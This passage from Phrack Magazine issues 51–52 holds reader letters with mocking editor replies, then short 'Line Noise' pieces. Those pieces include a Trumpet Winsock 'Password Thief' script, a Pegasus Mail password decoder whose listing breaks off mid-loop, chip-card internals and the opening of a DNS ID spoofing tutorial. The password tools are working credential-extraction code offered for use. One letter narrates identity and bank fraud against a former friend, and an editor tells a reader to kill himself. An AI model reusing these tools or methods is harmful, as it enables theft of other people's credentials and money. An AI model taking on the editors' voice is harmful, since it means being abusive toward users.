[ Great. We're practically neighbors then. ]

I will pay I hear your one of the Best out there :-)

[ AHM THE BEST!@ ]

Melissa

P.S. I need to try to get these by Sun. Night I can e-mail them to you?

[ Hrm. `Melissa` huh... Hrm.. You'd better bring them over, this could take a while. ]

0x1c>-------------------------------------------------------------------------

Just wondered why everyone raves about PGP, even though it's breakable.

[ What the hell are you talking about? ]

Is it possible to by-pass 'Proxy blocks' on an internet connection? The local iNet connection has blocks on all hack/warez sites whereby when you try and access them you get a 'You're trying to access a filtered URL' message. I figured it would be possible to re-route the connection but haven't a clue how.

[ Shure. Try some covert tunneling via IP fragmentation or IP-IP. ]

Also, how do you find out all this stuff about tapping phones, cell-net busting and telephone, errr, dabbling?? Do you research it yourself or just accumulate it from others?

[ Everything I know about phones is self-taught. ]

Many thanks,

Denyerec

0x1d>-------------------------------------------------------------------------

Hi, I've been reading a lot of phrack zines lately and seeing your name in most of them, I thought you're the best to answer my questions ???

To become a hacker where do I start ?

[ New Zealand. Or at least as far away from CA as possible. ]

What books should I read ?

[ Anything by Stevens/Knuth or any of the millions of smarter-than-you people out there. It's a safe bet that, if they wrote a book, they're smarter than you. Very safe bet. Like, Fort Knox safe. ]

What languages do I have to learn ?

[ English is a good start. ]

Which sites are the best to go to for information on hacking (including newsgroups) ?

[ Anything in the alt.* hierarchy is a good plan. It's ALL *choice* material. ]

I've only started hacking and that's into applications on my computer and my friends' computers.

[ That's nice. ]

I hope I'm not bothering you with this message.

[ No bother at all. I'm shure you've made someone smile, somewhere. ]

0x1e>-------------------------------------------------------------------------

Dear Phrack,

I'm looking for a phreak to work in France and I couldn't find such informations on the Net; so, is there any chance that blue box may work in France, or the Phoney app which comprise red, bleu, green, and black boxes, and if so it is, how does it work ? Also, there is any site on the Net where I can find informations and tools for phreak in France? Thank you so lot by advance for your advices.

[ Now, I don't know any French people, but, I think if I met some, they would like me. I don't give into all that `French people suck` propaganda. Nono. I think they rock. And the French women are really pretty, too. ]

0x1f>-------------------------------------------------------------------------

I use a macintosh when I ip spoof. Please, if you use a macintosh, send me a hacked version of TCP/IP and/or a hacked version of Open Transport. thanks.

[ You're neat. Let's be pen-pals. ]

0x20>-------------------------------------------------------------------------

Hello! Sorry for boring you, but I've some problems with L2 on FreeBSD-2.2.1R and decided to ask you about some tech details.
The problem is that 'loki' is unable to receive ICMP_ECHO packets from 'lokid'. I dug through kernel netinet sources and AFAIK, there is no way to pass ICMP_ECHO packets to userland. In ip_icmp.c we have:

ICMP_ECHO->icmp_input()->icmp_reflect()->ICMP_ECHO_REPLY->icmp_send()->net

So, there is no chance to receive ICMP_ECHO in application program, isn't it?! Unfortunately, I've no access to Linux box, so I can't see what happens there.

[ You are correct. In the accompanying paper I allude to this problem. Net/3 based stacks will not pass ICMP request packets to userland. ]

Are there any workarounds? I can patch my kernel, but I think this is not the right way. What do you think about this?

[ Running the client and daemon on Net/3 boxes is a problem. ]

p.s. The idea of the patch is simple - create a copy of the packet's mbuf via m_copy(), send it to rip_output() and only after that pass the original packet to icmp_reflect().

[ Cool! Write the patch up and I'll publish it in a future issue. ]

Regards, Roman.

0x21>-------------------------------------------------------------------------

I would like to put a request out for all so called "hackers" to join up i can't find nobody to talk to in this Hellhole Richmond,Virginia I want to put a message up for all VA area code 804 hackers that live near richmond to email me at DrMischief@juno.com . ThanX

ThanX, Mischief ALIAS: DrMischief

[ Here's your chance. ]

0x22>-------------------------------------------------------------------------

Let me start by saying your magazine is great. I read it whenever I have time. I am a newbie and want to know if you know anyone who could help me get started who lives/operates in the Morris County, NJ area.

~The Gator

P.S. If you know anyone using the handle 'The Gator', can you please tell me so I don't offend anyone.

[ You mean you haven't checked in the official codename repository? Oh boy. I don't envy you. `The Gator` is one of the most sought after nicks in the history of nicks! You're in for it now. God help you. ]

0x23>-------------------------------------------------------------------------

Hello! Thanks for such a good e-zine. It has a lot of relevant articles, and it helped me start hacking. Again. thanks for that. I was wondering one thing, however: do you know anything about the Mentor? He wrote the Hacker Manifesto, and I believe he wrote an article for phrack once...... Could you give me any help, please? I'm doing this for a school project....

[ I hear the mentor joined a new wave band and changed his name to Bobbysox. ]

0x24>-------------------------------------------------------------------------

Where can I find a sshd.c trojan?

[ http://www.cs.hut.fi/ssh/#current-version ]

0x25>-------------------------------------------------------------------------

I'd like to know if someone of you ever made some compiling in C (I'd like something for you) thank's

[ Huh? ]

0x26>-------------------------------------------------------------------------

Hi, I need a FALSE IP APP: Can You Help ME?

[ NO I can't HELP you AT all. ]

0x27>-------------------------------------------------------------------------

I heard about Phrack magazine issue talks about hijacking sessions, which one is that issue? I can't find it.

[ P50-06 ]

0x28>-------------------------------------------------------------------------

I'm trying to reach all the real hackers and phreaks (not stupid warez lamers) in the 601 area code, especially those around Lauderdale county, so I figured Phrack would be a good place to start. A few friends and I are gonna be starting some get-togethers at the new Bonita Lakes Mall in Meridian when it opens up later this October (probably long past by the time the issue of Phrack this will be in comes out). All fellow readers interested in reviving the HP scene in the East Mississippi-West Alabama area are welcome to come (reviving assumes that there was ever a scene here in the first place. We're quite boring hicks in this part of the country).
If you're planning on coming, or want more info, please E-Mail me at weaselsoftware@hotmail.com Even if we just have the locals, we should have a lot of fun, so if all goes well, I just might be writing an article for Phrack about it, if ya'll would be interested.

[ We wouldn't be. Ya'll. ]

Cheers,
-|/|/easel

0x29>-------------------------------------------------------------------------

I've a few questions about Juggernaut:

1) can it capture ethernet packet ?

[ It can capture many. ]

2) can it act like sniffer ?

[ Shure. ]

3) which compiler

[ GNU C compiler ]

4) does it have to run on root

[ No, it has to run as root. ]

5) which platform does it work on?

[ Linux (legacy version) Linux, BSD, Solaris (current unreleased version) ]

0x2a>-------------------------------------------------------------------------

You could say I'm a newbie or novice. I would be very grateful if you could send info on anything on beginning hacking. Like what computers are the best and what additional accessories you need. So in short please send any info you could. Thanks.

[ WHAT AM I DOING? I AM PUBLISHING PHRACK. WHAT IS PHRACK ABOUT? PHRACK IS ABOUT DISSEMINATING ENTROPIC INFORMATION TO ANYONE WHO WANTS IT. ARE YOU CONFUSED? IT WOULD APPEAR SO. ]

0x2b>-------------------------------------------------------------------------

I have heard about your magazine. I am not new but I am not experienced to this side. Would you please guide me to where I would begin.

pool

[ P51-02@0x2a ]

0x2c>-------------------------------------------------------------------------

Kong-ratz Guyz! You made it onto C|NET Last night at 10 on (Sept) the 5th. They were bashing you! Damn..... Well that's it. C-ya!

[ Hrm. ]

0x2d>-------------------------------------------------------------------------

After reading Phrack for years and being in the computer industry for 18+ years, I thought it was time that I write in. I have been reading Phrack for about 6 years now. Even talked to Erik Bloodaxe a few times in regards to Banyan Vines a couple of years ago when I was in the military. The scene seems to have changed so much now. It used to be full disclosure for the most part. Now everyone is so paranoid of sharing what they know, since everyone will rush a patch out for the latest exploit. How do you think others learned? Hacking is and always will be about exploring the limits of systems and networks. As you learn and share, others can expand their knowledge base. I started back on Atari 400s years ago coding in BASIC. I know many will laugh at that very thought, but it was a start. The groups back then were very tight, but also willing to help each other. If you showed a willingness to learn, and took the time to learn, instead of just leeching, it was amazing what others would do to help you.

I have been digging through tons of sites lately, most are outdated hacks from what I have seen. Most places patch as fast as something hits the `Net. But at least you can learn from the code if you take the time. I want to send congrats out to Phrack. You guys along with a handful of others make it a point to keep sending things out to us in the community. One of the comments I am sure to hear is, then why don't you contribute things? I have not to Phrack directly, but that will change soon. I don't have a lot that is that great, that hasn't been patched for already. Mine is more tinkering and learning. Anyway, I am sure I have rambled enough for now. Just thought I would give my $.02 worth. Keep up the good work at Phrack!

L8R,
D-Man

0x2e>-------------------------------------------------------------------------

I am looking for a REALLY good telenet software and an also REALLY good

[ I like the telnet software that comes with 4.4BSD. ]

scanner software. Can you refer me anywhere?

[ Scanners was a terrifying movie! Why would you want to scan someone?!@ ]

I also would like to know how you decode the password in the passwd file.
For example it writes:

john: x :9999 :13: John Johnson:/home/dir/john:/bin/john

[ 'x' is a shadow password token. It cannot be decrypted. Furthermore: Unix passwd encryption is based on a modified version of DES. The user enters her login and password at the prompts. The user entered password is used as a key to encrypt a 64-bit block of NULLs. The first seven bits of each character are extracted to form a 56-bit key. (The other eight are used for parity.) This implies that only eight characters are significant to a password. The E-table is then modified using the salt, which is a 12-bit value, coerced into the first two chars of the stored passwd. The salt's purpose is to make precompiled passwd lists and DES hardware chips ineffectual (or more difficult to use). Then, DES is invoked for 25 iterations on the block of zeros. The output is 64-bits long, and is then coerced into a 64 character alphabet (0-9, A-Z, a-z, ".", "/"). This involves translations in which several different values are represented by the same character. Unix passwd crypts are the product of a one-way hash. Information about the key is dropped in every iteration. Bits are LOST in the process. crypt(3), therefore, CANNOT be decrypted, reversed, or otherwise subverted from any type of scrutiny of its output. ]

0x2f>-------------------------------------------------------------------------

To the Editor:

I have to give out props to the job done on Phrack51.....it just keeps getting better and better. I've enjoyed Phrack 1-50 but I must say that since the current staff of the mag took over I've really noticed a marked improvement in the quality and content of the articles. Thanx for making this magazine available to all of us out here who are reading and learning. But just one thing, where's my pics of Milla Jovovich in the nude!!!!!!

NMEwithin

[ http://www.infonexus.com/~daemon9/PIX/milla4.jpg ]

0x30>-------------------------------------------------------------------------

a story of adolescent revenge..by a not so adolescent at 3:37 am

[ Be warned. This is long. ]

So here I sit surrounded by an ashtray full of butts, empty beer cans, empty 2 liters, a giant pile of papers, a stack of cd's, dirty dishes, tangled cords, red and green lights, the ticking of the furnace and blurred vision. Just got back from the pool hall and pissed off. why? because an old friend is getting married tomorrow and I was not invited. Well WAS a friend is more to the point. Betrayal in any form is a great primer for hatred. I am a twenty something (hate that fucking phrase) loser with no clue on what the future holds..but I find pleasure in figurative masturbation with MY processor. Match wits with this bitch, tell IT what to do and make it my slave...cheap thrill. Having power over something or someone is great while it lasts..as long as you do not have a conscience. But I was wronged, so it is justified..my actions I mean... right? My girlfriend is asleep upstairs and thinks I sit up at nights doddeling to porn sites. I tell her that my pc is not working right, so that is why I am always working on it...that fucker bill gates. If he was as smart as the world believes he is, these activities would not be so easy. Back to the point. (sorry! had a few too many). So I sign on...search for allies, find them among other assholes that have somehow learned one of my handles. My buddies are up to some funny shit, not total anarchy, but funny none the less. So what do I do...I tell them that I am in a bad state of being at the moment..they ask why, "Time for pain!" is what I read. You know how it is. A friend since first grade on through college just fucked you for the 100th time. I feel sick about it, but none the less it's time to put to work the tricks of the trade.
I give my TRUE friends the skinny on my intentions, they oblige with laughter and frothing mouths. I cough up his SS#, home, phone, bank, work, license, and online accounts. Too late to turn back now. It's funny how one will actually take the gas pipe for virtual strangers that one has formed an online bond with, and will enlist them in a scheme to fuck a real time friend. (ex-friend). Number one, divide up the tasks. Number two, failure is NOT an option. Number three, ruin wedding. So here we go...secretary of state was a blow off, no brainer. PhoneCo a bit tougher (but been there before). Bank..oh the bank.. online banking 24/7 was such a good idea. My collective cohorts and I were like pitbulls fighting over the neighbor's cat. Giggling like schoolgirls. HEY we are elite! or so we think..most of our shit (not all) was built by others before us. We did modify code, but the backbone was not our own. Now it is 4:30 am and the shit is flying...after reading the "underground" being a martyr seems cool. My head is spinning, but I have to remain focused at all times..it is hard. Account activity...money is due to the banquet facility tomorrow. At least the balance of the shindig after the initial deposit. Check numbers and cleared transactions. He has no fucking clue! The best part was that he had mentioned writing a check for his balance only one day before.... but the amount owed was not cleared yet on his account. So time to insert! --0.00 balance. Too easy. OK, fine. Just a bounced check to deal with. Phones turned off (scheduled termination for lack of response to notices sent). Oh yeah..did I mention Utilities? Bank takes care of payment...how convenient. Car payments, insurance, mortgage the whole nine. Zip, Zero, Zed. A repeater. Constant (0.00). I am an asshole, I know, but being fucked by a 'FRIEND" is troubling and unforgivable in this situation. One more thing..Company Voice mail...fucked. Left a text to speech recording to boss, too funny and implicating to dillhole. It's like giving beavis and butthead a small piece of gray matter that works for only bad things. I should have been invited to this wedding, but never the less, he is marrying a whore. This may sound vindictive or like sour grapes, but totally true. So actually we are doing him a service, he just does not know it. The "ruin the wedding" part is actually out. It will happen and the avalanche of our actions will not start until the following week. But at least I did something, right? What a stupid thing to concentrate on. I am an idiot with things I should not have. Most of my collective friends are striking political targets...I am bouncing a check. But I am over it now. Time to sit back and wait...wait for the phone call from a mutual friend to give me the dirt. I guess I am the type of guy that would get a boner if I reset his sprinkler timer to go off when he is trying to get in his car. Totally retarded, but I would laugh for days. What's wrong with me? I am now sitting here in my self-made dungeon scratching my head saying to myself "boy that was way harsh". I know some people would pose the question, "what did he do to deserve this type of retaliation?". You know what it's like, you have been there at one time, and everyone reaches a point where counter measures are warranted. Case closed. What we did was but an inconvenience, but will be remedied. Nothing was left beyond repair. It's at these times! (no matter how trivial) you find out who is willing to take a bullet for you. And in some fucked up way, that is important. At least it is to me. it's 7:49 am and time for the sandman.

SychoSiS - The Collective.

[ I am not sure which saddens me more, the fact that you actually spent several hours writing this, or the fact that I spent several minutes reading it. Now Phrack's loyal readers can feel my pain and read this for themselves. ]

0x31>-------------------------------------------------------------------------

To whom it may concern:

I believe that I submitted an article to your publication on hacking the phones at your local WAL~MART, please be advised that I submitted the same article to 2600 magazine and blacklisted 411, however I submitted the article to 2600 magazine before yours or blacklisted, they have decided to publish my article, and therefore I wish to inform you of this so there is no confusion.

Thank you for your attention,

Pirho
-- Brought to you by Pirho and the International Brother Hood Of Frat Houses.

[ We can only hope that your article brings Emmanuel and the rest of the 2600 editorial team as much amusement as it brought us. Not from going and harassing people at Walmart, no. Mostly from laughing at you for writing it. We'll leave the articles on hacking things like Walmart and Disney World for publication by 2600. We like to think we still have a reputation for quality. -alhambra ]

0x32>-------------------------------------------------------------------------

Dear..sir I had readed yours doc.I'm interesting about hacking art and learing it.I would like to ask you.How can I hack my ISP?It's dumbing I know.But I don't know to ask anybody.

[ I wonder if the aleph1speak to English translator has a `Yoda setting`... ]

0x33>-------------------------------------------------------------------------

Hey, I just finished a two hour picture tour at your webpage, looked at every single photo hosted there, I know for one thing, with all the film you have used, Kodak must love you! The pics were a riot, matter of fact, I almost had an accident in my pants I was laughing so hard. Seems

[ Maybe you should get some rubber pants or those adult diapers. ]

like you and your friends know how to have fun (my kind of people) all we have up here is half-wit clowns.
Anyway, enuf with the bullsh*t, I just wanted to ask you who owns "INN", if it is you, how did you pay for all that hardware? Where are you located, Cali I assume? How old are you? Any chance of meeting somewhere to chat one day (IRC)? If it's too personal, I understand, if not, reply..

[ Are you coming on to me? ]

Regards
-Tyrant

0x34>-------------------------------------------------------------------------

[ ...Regarding the 'Teardrop' IP fragmentation bug... ]

Dear To whom it concerns,

I do not think you should have posted this about your bug you found. A lot of maniacs got a hold of it and are crashing servers everywhere. The net has turned into anarchy. I have about 4 servers down that I patched. But

[ The Internet is anarchistic by nature. ]

the patch doesn't seem to work.

[ The patch works fine. Perhaps it is you that is broken? ]

I do not think you should have posted that publicly like that.

[ Thanks. I'll make sure to file your opinion in the ignorance-folder. ]

0x35>-------------------------------------------------------------------------

I'm just wondering when is defcon and where can I find out about it a little bit more?

Regards.
Pav.

[ Defcon is traditionally held during the Summer in Sin City. Damn I love that town. http://www.defcon.org for more info, although the future of this Con is in question. ]

0x36>-------------------------------------------------------------------------

Where can I find ways to make Long Distance phone calls without getting billed (and preferably without making any boxes?)

[ A phone line for which you do not pay the bill. ]

I'm not an idiot, I just thought I'd ask. :)

[ Is that open to conjecture? ]

0x37>-------------------------------------------------------------------------

To Whom It May Concern:

I enjoy reading your stuff in Phrack and I pay attention to those stuff that is written about unix reading stuff. I am just wondering if there is any way to play tricks or hack linux 1.2.13. It also runs pine under it and I think there is a trick with .rhosts in pine and ls /tmp. Could you please tell me more stuff about this?? I could download the /etc/passwd file but then I have to use a dictionary to hack it and is there a way of hacking it without using a dictionary?? And how do I delete my last login file?? Thanks!!

Yours Truly
Tag

[ Linux 1.2.13 is one of the most impenetrable versions of Unix out there today. Not only is the Linux O/S renowned for its stalwart and impenetrable security but the 1.2.13 kernel was where Alan, Eric, Linus and the rest of the crew peaked. That kernel revision is all-but immune to every known form of attack (with the possible exception of quantum state disassembly). Your best bet is to kill yourself now. ]

0x38>-------------------------------------------------------------------------

How ye all doin there at Phrack, hope you're all keepin well. Anyways before I say anything I'll admit it, I'm a newbie, not a lamer, a newbie. I've read all the hacking files I can get my hands on. There's only one small problem...I live in Ireland. A few weeks ago I was given an article written by "Hackwind" (1992 I think) about the hacking scene in Ireland. Believe you me. It's even worse than he says it is. The main problem is that all the files written don't relate to Ireland in any way. I don't even know ONE bbs in Ireland and NO ONE I have spoken to does either. I don't expect you to know much about the hacking scene in Ireland but if you do know anything, anything at all could you please send it to me. I'm dying for information. Information that I can't get my hands on. If you don't know anything about it perhaps you know of some contacts. Please let me know.

Cheers,
N0_eCH0

PS. Keep up the good work at Phrack.

[ Ok, someone in Ireland help this guy out. ]
]

0x39>-------------------------------------------------------------------------

hello my name is FUSION from a group called digital elite alliance and i was wondering if you would like to become allies with us. If so e-mail me back at XXXX@prodigy.net and then i'll get back to you.

[ Don't hold your breath. Wait. On second thought, do. ]

0x3a>-------------------------------------------------------------------------

Daemon9,

Hi! I'd like to ask you a very common question. Maybe every day you receive mails asking it. Yes, what I want to know is how to become a great hacker.

[ Swing from the shoulders, not from the arms. ]

I am a freshman in university. I want to be a hacker, not for doing damage to others, but in my own view, being a hacker requires a lot of knowledge and creativity. I aim at knowledge and want to find out new tech, while not just using others'. In fact, I have read many articles about how to become a hacker. And I have done them. Now, I have mastered C, unix shell, and some of TCP/IP. So what should I go on to learn if I want to be a great hacker like you?

[ If you have mastered the aforementioned topics, you are far greater than I. ]

I am learning socket programming and IP-spoofing now, do you have any resources on the net to recommend to me? Please write me back. Hoping to hear from you soon.

Liu Jiangyi

--

Daemon9,

Hi, I forgot to ask you another question. Should I join a hacker group? And have you joined one? If so, please tell me which group I should join. And the mailing lists, which one should a hacker join in your own view. Hoping to hear from you soon!

Liu Jiangyi

0x3b>-------------------------------------------------------------------------

[ A few letters to nirva and I. I swear to GOD these aren't made up. I *couldn't* make stuff like this up. ]

Hey Route,

I was wondering if you knew what colours Nirva dyed his hair for defcon and who made the dye, I was also wondering if you had a copy of LISP lying around somewhere.
Are you going to the KMFDM concert this friday by any chance? I was wondering if you have ever been busted for hacking or phreaking and how you manage to hack with the constant surveillance by the man? Also if you don't mind telling me, how did you get into hacking and did you have a mentor at any stage?

Ciao and thankx

--

Hey Nirva,

I was wondering how you got Real Kitty to drink coke out of those bottles from McDonalds (or is he just chewing on the straw). I was also wondering who Mike is currently going out with, not to mention you as well? If you could do me a favour and try to convince Mike to give me some webspace as well, I would really appreciate it.

Thankx and Ciao

--

Hey Mike,

How would you like to win a date with carmen electra, if you would like to, go on over to durex.com and there's a link from there to the american site with the entry form to win the date, and being such a brilliant hacker I don't see how you couldn't manage to rig the contest ;)

Thankx and Ciao

0x3c>-------------------------------------------------------------------------

Arggh, think of me what you will, but i Can't get over a pic on yer site of nirva, prolly one of the l33t3st looking individuals i've seen, in personal appearance (no, i aint gay), but anyway .. what are those things on his arms ? I saw that photo with the caption "nirva has rickets" or something, but are they implants ? ie part of his image/appearance or were they sum sort of weird disease he picked up ?

[ Due to the vitamin-D embargo of 1975 - 1978 in New Mexico, nirva contracted the rare disease osteomalacia (rickets). He has it mostly licked these days thanks to heavy amounts of vitamin-D laced EMF radiation treatment he undergoes 2 times a week. Every now and then, however, he lapses, as you can see from the aforementioned picture. ]

tah man ..
great page btw

speaxx

0x3d>-------------------------------------------------------------------------

----[ EOF

---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 03 of 20

-------------------------[ P H R A C K 5 2 L I N E N O I S E

--------[ Various

0x1>-------------------------------------------------------------------------

Upon discovering Doctor Jeep's "Trumpet Winsock Password Hacker" in P51-03, I felt obligated to share a small piece of code that I don't like to admit that I created, far earlier than the esteemed Jeep's published work. As his requires access to a Pascal compiler and does not seem to be coded with portability in mind, the fact that my script requires Trumpet itself to run does not seem too great a hindrance. The irony is that not only is the "cipher" a simple obfuscating XOR, but that Trumpet itself will decode it for you.

<++> password.cmd
# Put in Trumpet Winsock directory, run under "Dialer/Other"
# Cannot currently use any file other than trumpwsk.ini,
# apparently due to implementation errors in the "load" function

display \n
display "Trumpet Password Thief 1.0, 8-18-95"\n
display \n

# "load" reads the obfuscated value from trumpwsk.ini and Trumpet
# de-XORs it into the variable for us
if [load $username]
  display "username: "
  display $username\n
else
  display "ERR: cannot load username"\n
end

if [load $password]
  display "password: "
  display $password\n
else
  display "ERR: cannot load password"\n
end

display \n
<-->

- anonymous

0x2>-------------------------------------------------------------------------

Another password decoder for ya... written long ago, I just never bothered to release it...
<++> peg-dec.c
/*
 * Pegasus Mail Password Decoder v1.0 by Belgorath
 */

#include <stdio.h>
#include <stdlib.h>

/* Decoding/Encoding Tables: one table per password length (1..8),
 * one offset per character position */
int dec1[1] = { 44 };
int dec2[2] = { 16, 21 };
int dec3[3] = { 10, 22, 28 };
int dec4[4] = { 37, 28, 21, 7 };
int dec5[5] = { 21, 22, 37, 28, 9 };
int dec6[6] = { 22, 15, 28, 42, 17, 2 };
int dec7[7] = { 15, 17, 21, 31, 0, 12, 19 };
int dec8[8] = { 9, 2, 7, 20, 44, 22, 28, 23 };
int *decz[8] = { dec1, dec2, dec3, dec4, dec5, dec6, dec7, dec8 };

/* numch = total password length, pos = 1-based position of the character */
int decode_char(int numch, int ch, int pos)
{
    ch -= decz[numch - 1][pos - 1];
    if (ch < -127)
        ch += 256;
    return ch;
}

void main(void)
{
    int zz, x, nc;
    char *tz;
    int inps[20];

    nc = 0;
    tz = malloc(8192);
    printf("Enter Pegasus Mail Password: ");
    gets(tz);

    /* Fun input parsing loop. Hope your malloc bzero's... */
    while (*tz) {
        for (x = 0; x
/* The listing is cut off at this point in this copy; the rest of the
 * parsing loop and of main() is not recoverable from it. */
<-->

0x3>-------------------------------------------------------------------------

                        :----------------------------:
                        .  Siemens Chip Card Technology .
                        .        by Yggdrasil           .
                        :----------------------------:

Chip cards differ from one another in memory size, type of memory (PROM or EEPROM), security logic and micro-controller. This article will discuss the Siemens SLE4404 chip card technology. The SLE4404 is employed for electronic purse cards and bank transactions, cellular telephony (pre-paid cards), user IDs for access control, etc. (some examples: SmartCard, ViaCard and the Italian Bancomat). Its data can be accessed through a simple TTL serial channel, providing a +5 Vcc power supply from an external source.

Inside the chip
~~~~~~~~~~~~~~~

The chip card has at its disposal EEPROM memory consisting of a 416-bit matrix (each row is 16 bits) that is protected by security logic providing access control.
This is the logic diagram:

                +------------------------+     +------------------+
                |    Address Counter     | --> |  Column Decoder  |
                +------------------------+     +------------------+
                            ^                           |
                            |                        16 |
                            v                           v
                     +-----------+   +---------+   +------------------+
   C3,C8,C2,C5 -->   | Control & |   |   Row   |   | User mem 208 bit |
   C1 (Vcc)    -->   | Security  |   | Decoder | --> | Sec unit 192 bit |
   C7 (I/O)   <-->   |   Logic   |   |         | 26 | Special mem unit |
                     +-----------+   +---------+   +------------------+
                            ^             ^
                            |             |
                            +-------------+

The SLE4404 memory is subdivided into three main memory blocks: one is read only (a "PROM" containing the manufacturer code and/or a serial number and an expiration date), the second is both readable and writeable (user memory) and the last block cannot be written to unless the lock-out fuse has been blown.

This is the memory map:

 BLOCK TYPE           SIZE (BIT)  ADDRESS   READABLE  WRITEABLE  ERASEABLE
 -----------------------------------------------------------------------------
 Manufacturer code        16      0-15      Yes       No         No
 Application ROM          48      16-63     Yes       No         No
 User code                16      64-79     [fuse]    U.C.       U.C.
 Error counter             4      80-83     Yes       Yes        U.C.
 EEPROM #1                12      84-95     Yes       Yes        U.C.
 EEPROM #2                16      96-111    Yes       U.C.       U.C.
 Frame memory block
  - F.M. config            2      112-113   Yes       Yes        U.C./R.C.
  - Frame memory         206      114-319   [cfg]     [cfg]      U.C./R.C.
 Frame code               32      320-351   [fuse]    [fuse]     [cfg]
 Frame counter            64      352-415   Yes       Yes        [cfg]
 -----------------------------------------------------------------------------

Meaning of abbreviations:

 U.C.   - User code required (each time the code is entered the error
          counter is decreased)
 R.C.   - Frame code required (each time the code is entered the frame
          counter is decreased)
 [fuse] - Operation allowed ONLY IF the lock-out fuse has not been blown
 [cfg]  - Operation allowed according to the frame memory configuration

Frame memory configuration table:

 BIT 112  BIT 113  MEMORY MODE   READABLE  WRITEABLE
 -----------------------------------------------------------------------------
    0        0     Secret ROM    Yes       No
    0        1     R.O.M.        Yes       No
    1        0     Secret PROM   U.C.      U.C.
    1        1     P.R.O.M.      U.C.      U.C.
 -----------------------------------------------------------------------------

The first 16-bit block is for the Manufacturer Code. The following 48-bit block is called Application ROM, containing another code (manufacturer sub-code or info, serial number, sub-type of card, etc.). The User Code is the access code (PIN) used to read/write/erase memory. This code can be modified provided that the fuse has not been blown, while the error counter value can be modified even if the fuse has been blown... Please note that access to memory is blocked after four incorrect access attempts (checked by the counter). The same goes for the Frame Code and the Frame [error] Counter (note that the number of incorrect accesses is limited to three attempts instead of four). Finally, the Frame Memory is generally used for storing personal user information or the credit limit (money that can be fetched in a bank transaction, or the remaining "virtual" credit that a pre-paid cellular card contains).

The Pin-out
~~~~~~~~~~~

This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected):

   +-------+-------------------+
   | C 1   |               C 5 |       Contact  Pin  Info
   |       |                   |
   +-------+           +-------+          1      6   Vcc +5V
   | C 2   |           | C 6   |          2      5   Reset
   |       |           |       |          3      4   Clock
   +-------+           +-------+          4      3   Test input - N.C.
   | C 3   |           | C 7   |          5      8   Ground
   |       |           |       |          6      7   N.C.
   +-------+           +-------+          7      1   Bi-directional I/O data line
   | C 4   |           | C 8   |          8      2   Control input (data change)
   |       |           |       |
   +-------+-----------+-------+

   "I am for ever walking upon these shores,
    betwixt the sand and the foam.
    The high tide will erase my foot-prints,
    and the wind will blow away the foam.
    But the sea and the shore will remain
    For ever."
                         -- Gibran K. Gibran

0x4>-------------------------------------------------------------------------

      ___    ______    _   _
     /   \   |  _  \   | \ / |
    |  / \   | | | \   | | \_/ |
    | |___|  | | |_ /  | | \_/ |         ..oO THE
    | --- |  |    /    | | | |           CreW Oo..
    '''  '''  '''''''  ''''  ''''

                              presents

                           DNS ID Hacking


--[1]-- DNS ID Hacking Presentation

You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID hacking is not the usual kind of hack or spoof: it is based on a weakness in the DNS protocol itself. Worse, the DNS ID hack/spoof is very efficient and very strong, as no generation of DNS daemon escapes from it (not even WinNT!).

--[1.1]-- DNS Protocol mechanism explanation

In the first step, you must know how DNS works. I will only explain the most important facts of this protocol. In order to do that, we will follow the way of a DNS request packet from A to Z!

Name resolution example:

The client (bla.bibi.com) sends a request to resolve the name "www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" as its DNS. Let's take a look at the following picture..

      /---------------------------------\
      | 111.1.2.123 = bla.bibi.com      |
      | 111.1.2.222 = dns.bibi.com      |
      | format:                         |
      | IP_ADDR:PORT->IP_ADDR:PORT      |
      | ex:                             |
      | 111.1.2.123:2999->111.1.2.222:53|
      \---------------------------------/

   ...
   gethostbyname("www.heike.com");
   ...

   [bla.bibi.com]                                   [dns.bibi.com]
   111.1.2.123:1999 ---> [?www.heike.com] ------> 111.1.2.222:53

Here we see our name resolution request from source port 1999, which is asking the DNS on port 53 (note: DNS always listens on port 53).

Now that dns.bibi.com has received the resolution request from bla.bibi.com, dns.bibi.com will have to resolve the name:

   [dns.bibi.com]                                   [ns.internic.net]
   111.1.2.222:53 --------> [dns?www.heike.com] ----> 198.41.0.4:53

dns.bibi.com asks ns.internic.net (a root name server) for the address of www.heike.com. The root doesn't have it, so it refers us to a name server which has authority over the '.com' domain (note: we send the request to the Internic first because it could already have the answer in its cache).
   [ns.internic.net]                                           [ns.bibi.com]
   198.41.0.4:53 ------> [ns for .com is 144.44.44.4] ------> 111.1.2.222:53

Here we can see that ns.internic.net answered ns.bibi.com (which is the DNS that has authority over the domain bibi.com) that the name server for .com has the IP 144.44.44.4 (let's call it ns.for.com). Now our ns.bibi.com will ask ns.for.com for the address of www.heike.com, but this one doesn't have it either and will refer us to the DNS of heike.com, which has authority over heike.com.

   [ns.bibi.com]                                    [ns.for.com]
   111.1.2.222:53 ------> [?www.heike.com] -----> 144.44.44.4:53

The answer from ns.for.com:

   [ns.for.com]                                                [ns.bibi.com]
   144.44.44.4:53 ------>[ns for heike.com is 31.33.7.4] ---> 111.1.2.222:53

Now that we know which IP address has authority over the domain "heike.com" (we'll call it ns.heike.com), we ask it what the IP of the machine www.heike.com is.

   [ns.bibi.com]                                    [ns.heike.com]
   111.1.2.222:53 -----> [?www.heike.com] ----> 31.33.7.4:53

We now have our answer:

   [ns.heike.com]                                               [ns.bibi.com]
   31.33.7.4:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53

Great, we have the answer, we can forward it to our client bla.bibi.com.

   [ns.bibi.com]                                               [bla.bibi.com]
   111.1.2.222:53 -------> [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999

Now bla.bibi.com knows the IP of www.heike.com.

Now let's imagine that we'd like to have the name of a machine from its IP. To do that we proceed a bit differently, as the IP will have to be transformed first.

Reverse name lookup resolution:

   100.20.40.3 becomes 3.40.20.100.in-addr.arpa

This transformation is only used for IP resolution requests (reverse DNS). Let's look at a practical example where we take the IP address of www.heike.com (31.33.7.44, or "44.7.33.31.in-addr.arpa" after translation into a form DNS understands).

   ...
   gethostbyaddr("31.33.7.44");
   ...
We send our request to ns.bibi.com:

   [bla.bibi.com]                                           [ns.bibi.com]
   111.1.2.123:2600 -----> [?44.7.33.31.in-addr.arpa] -----> 111.1.2.222:53

Which is forwarded to ns.internic.net:

   [ns.bibi.com]                                         [ns.internic.net]
   111.1.2.222:53 -----> [?44.7.33.31.in-addr.arpa] ------> 198.41.0.4:53

